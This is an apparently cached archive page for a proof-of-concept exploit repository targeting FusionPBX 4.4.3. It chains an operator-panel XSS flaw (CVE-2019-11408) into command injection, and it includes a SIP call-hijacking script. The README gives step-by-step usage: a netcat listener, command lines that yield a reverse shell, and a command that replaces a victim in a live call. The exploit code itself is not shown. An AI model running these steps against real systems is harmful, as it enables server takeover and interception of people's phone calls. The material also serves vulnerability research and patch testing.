Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-11408 PoC — FusionPBX Operator Panel模块跨站脚本漏洞

Source
Associated Vulnerability
Title:FusionPBX Operator Panel模块跨站脚本漏洞 (CVE-2019-11408)
Description:FusionPBX 4.4.3版本中的Operator Panel模块的app/operator_panel/index_inc.php文件存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
Description
Chain CVE-2019-11408 – XSS in operator panel and CVE-2019-11409 – Command injection in operator panel.
Readme
<h1>Prelude</h1>

This simple code tries to complete the implementation of the chained vulnerability introduced
by [Dustin Cobb](https://www.linkedin.com/in/dustin-cobb-b33ba6b9/) at [RCE Using Caller ID – Multiple Vulnerabilities In FusionPBX](https://www.aon.com/cyber-solutions/aon_cyber_labs/rce-using-caller-id-multiple-vulnerabilities-in-fusionpbx/).

<h1>RCE</h1>

<h2>Reproduction Steps</h2>

1. View the vulnerable operator screen in a web browser, located in this example at https://{fusionpbx_address}/app/operator_panel/index.php
2. Start a `netcat` listener on a remote system (rce_listener_address).x`
3. Run the exploit code below on the remote system in another terminal window `python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}`
4. The exploit will connect to the `netcat` listener and provide a reverse shell

<h1>Replace a call</h1>

While we know Call-ID, from-tag, and to-tag from a call, running the below code will replace you instead of the victim in the call.

<h2>Reproduction Steps</h2>

1. First initiate a call between to SIP UA.
2. After call established we need construct dialog_identifier by concatenating {Call-ID}{semicolon}"to-teg:"{to-tag}"from-tag"{from-tag}.
3. Run the hijacker code below on remote system and replace you with victim number. `python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}`
File Snapshot

[4.0K] /data/pocs/27bc525a3a1d15a97aad49aeda15ae73aece0019 ├── [1.5K] README.md ├── [4.0K] sources │   └── [1.7K] kamailio.5.1.1.rst └── [4.0K] src ├── [2.7K] attack.py ├── [1.5K] main.py ├── [9.6K] sip_client.py └── [ 998] transfer.py 2 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.